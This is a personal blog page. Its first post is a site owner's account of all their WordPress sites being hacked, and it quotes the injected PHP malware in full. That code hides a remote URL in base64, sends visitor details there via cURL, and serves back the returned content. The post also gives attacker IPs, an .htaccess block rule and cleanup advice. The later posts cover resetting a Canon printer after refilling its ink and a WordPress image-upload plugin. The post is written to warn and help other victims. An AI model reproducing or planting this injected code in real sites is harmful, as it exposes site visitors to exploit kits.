WordPress Sites all HACKED!

Posted on February 9, 2012 by

It’s been a while since I’ve updated, and this is for shame because I have a lot of stuff happen to me and a lot of neat shit to say sometimes.

But, the News Headline is: “ALL MY WORDPRESS SITES WERE HACKED.”

I went through each of these sites and found that the only thing in common was they’re WordPress and most (but not all) had the “All in One SEO” plugin.

There are other similarities, I’m sure, probably as many as there are differences.

Regardless, here’s how they got in…

From my log files (FTP and general): /home/jexanaly/ftpchk3.php a _ i r [mainftpaccount] ftp 1 * c Mon Feb 06 07:49:31

Where [mainftpaccount] is the name of my main FTP account. They put the “ftpchk3.php” file and “counter.php” in the root from the IP 61.191.190.51 and then, within a half hour, they start hitting my site with a download and then immediate upload of every index.php file in ALL of my folders… from this IP: 188.138.112.15

They had to be targeting WordPress though, because they also went into each of my WordPress Theme Folders and edited the “footer.php” file and “home.php” if it existed (in addition to “index.php”).

They put this ratbagbastardshit code into each of those files:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = “”;
if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( ‘aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==’).’?ip=’.urlencode($_SERVER['REMOTE_ADDR']).’&useragent=’.urlencode($sUserAgent).’&domainname=’.urlencode($_SERVER['HTTP_HOST']).’&fullpath=’.urlencode($_SERVER['REQUEST_URI']).’&check=’.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]==”O”)
{$sResult[0]=” “;
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

This is a cURL call (uses PHP to pull the content of a URL) to this website: http://hotlogupdate.com/stat/stat.php

DO NOT, REPEAT, DO NOT VISIT THIS WEBSITE.

These scumbagshitwadcrapfaces use the file on that website above to hit you with what’s called an “Exploit Pack” where it’s got just about every virus ever created by some pasty-white 32-year old virgin suckin’ down Mountain Dew and Fritos and trying to take over the world before he levels up or his mom asks him to get his ass out of the basement and clean his room.

So yeah, don’t go there. If you do, you might catch what I got, the “System Check” virus and then the “iexplore.exe” virus.

I fixed “System Check” by restarting into Safe Mode and running MalwareBytes, SuperAntiSpyware, Spybot S&D and CCleaner.

I fixed “iexplore.exe” by loading a six-shooter with one bullet, spinning the chamber, putting the gun to my head, and pulling the trigger. When I realised that I was still alive and that all the crap I’d tried hadn’t worked, I restarted into Safe Mode, ran Combofix.exe (all night too, for despite the fact that it says “Seriously infected systems may take 20 minutes” it was still running 8 hours later…), then ran SuperAntiSpyware, TrojanKiller, MalwareBytes, Spybot, HijackThis, CCleaner (which wipes out too many Windows user settings to be worth it) and then downloaded and installed avast! That seemed to do it, though the handgun would’ve probably been easier.

So, that’s if you’re infected.

If it’s just your poor websites that have gotten hit, then first deny those sunsabiches access from your .htaccess file:

order allow,deny
allow from all
deny from 61.191.190.
deny from 188.138.112.

This will deny the entire IP range. You might miss out on some visitors from China or Amsterdam, but I reckon it’s worth it to avoid the sh*t you’ll get otherwise.

Next, I went through and started fixing the index.php files by getting rid of all that extra code. Off 13 infected websites. It took a long time.

When I looked again, those bastardcockfacehells had come back and reinfected all my files, despite the fact that I changed all my FTP passwords.

So, after you restrict their IP and change all your FTP passwords, you should check out this fix I wrote:

MASSIVE DISCLAIMER: This script uses fopen, fread and fwrite so you must have the appropriate folder permissions. It will also rewrite files that are infected, so DO BE CAREFUL. I tested this bugger by unceremoniously truncating every goddam file on the website you are now on, so I know it works for me, but if you mess with any of that code, you’ll probably nuke your site too. So don’t.

Download “Fix Hacker Shit”.

  1. Download the file and unzip it.
  2. Copy fix-hacker-shit.php to your root directory.
  3. Go to a browser and punch in “http://www.yoursitehere.com/fix-hacker-shit.php”.
  4. Crack a beer, watch it work.

If you don’t see anything, then you weren’t infected.

And if you were, isn’t this way much better than going through fifty eleventy brazillian geedarnfickety folders and changing all the index files back?

Now, for those of you that Googled and Googled and couldn’t find a blasted thing on this subject, here’s some keywords to help others get here:

That’s it. I hope some or all of this helps.

Good Luck and Have a Good Website.

-Judd

Category: Resources | 33 Comments

Refilling ink cartridges – Canon MP160

Posted on November 10, 2010 by

Okay, here’s the deal.  I absolutely REBEL against the idea that two cartridges cost more than my printer.  I know, I know, that’s how they make their money, but still.  Henry Ford said about his cars, "If I could be guaranteed people would buy all their parts from me, I’d give ‘em away!"  So there you go.  Rampant consumerism and Planned Obselesence.

*steps down off soapbox*

So I’ve got an old Canon Pixma MP160.  It does what I need and what I need isn’t much.  When it ran out of ink, I got sad, and then I bought some ink squeezy shooter things, and I wasn’t sad any more.

I took the cartridges out, filled ‘em back up with ink with the ink squeezers, and then popped ‘em back in.

Printer fired up, then "E5" is flashing.  Well, rather, "E" then "5" and then "E" again.  I assumed it was "E5" instead of "E5E5E5" which would mean "light grey" in hexidecimal speak.

I Googled and Googled and banged my head against the desk repeatedly, mostly because the instructions didn’t work and also because the printer is under my desk and I couldn’t reach it, so BANG every time I tried to hit buttons.

Here’s what I had to do every time, and because I keep forgetting it and finding completely inane and/or incomplete instructions on Googs, I’m listing it here, so that the next time I have to do it and I Google "resetting MP160" or "refilling ink cartridges MP160 E5 error" I’ll find some good instructions.

Here goes:

  1. Unplug printer.  Leave it while you whistle a tune or make tea.
  2. Plug it back in.  Plug it into your computer too.
  3. Press and hold the "Stop/Reset" button and then press the "Power" button.  As soon as the "Power" button lights green, release the "Stop/Reset" button and then press it twice.
  4. Things will start happening.  The "Alarm" light will blink intermittenly and your printer will sound like it’s booting up.  Hit the "Stop/Reset" button sometime during this, only once, and when the printer’s done doing its thing, it’ll show "0" in the counter thingie.  If you don’t hit "Stop/Reset" during this, then the little "0" never appears.  Nobody told me this.
  5. NOW hit "Stop/Reset" 4 times, which will alternate the "Alarm" and "Power" buttons lighting up.  The "Power" button should be the one that’s lit when you’re done counting.
  6. Now press "Power" once, twice.  Things will blink like it’s saying "Thank You".
  7. Now hit "Power" again to turn it off.
  8. Now say a silent prayer to the Gods of Cheapassery, and turn it back on.
  9. Now print stuff and revel in the $13 you spent on ink instead of the $63 you spent on new cartridges.

Screw you Henry Ford!

Category: Resources | 2 Comments

Jex Member Image Upload Plugin

Posted on May 12, 2010 by

Plugin Name: Jex Image Upload Page for Members

Plugin URI: http://www.jexanalytics.com.au/plugins/jex-member-image-upload-plugin
Description: Folks that are logged in to a WordPress site can upload images to a general page of the admin’s choosing (by placing "[jex_member_image_upload_form]" on that page.  The image gets stored in the "uploads" folder and the Admin then gets an email notification that they can ‘approve’ or ‘disapprove’ the image.

Version: 1.0

Author: Judd Exley

Author URI: http://www.jexanalytics.com.au/

Requirements: PHPMailer and some other stuff that I haven’t figured out yet.

WordPress Version: 2.1 and up.

INSTALLATION: Simply copy the jex-image-upload-for-members.php file into your /plugins directory and activate it.  Then, place [jex_member_image_upload_form] on any page that you want people to be able to upload images to.

NOTES: It only works for one page at a time thus far, so if you put the form on multiple pages, it’ll pull all images that have been approved for the whole site.  I haven’t coded it for a "per page" use yet.  YET.

UPDATE: Yes, yes it DOES now work on multiple pages.  Mostly because IHS Web Solutions wanted that and because I rock hard for them.

DOWNLOAD PLUGIN

Category: Plugins | No Comments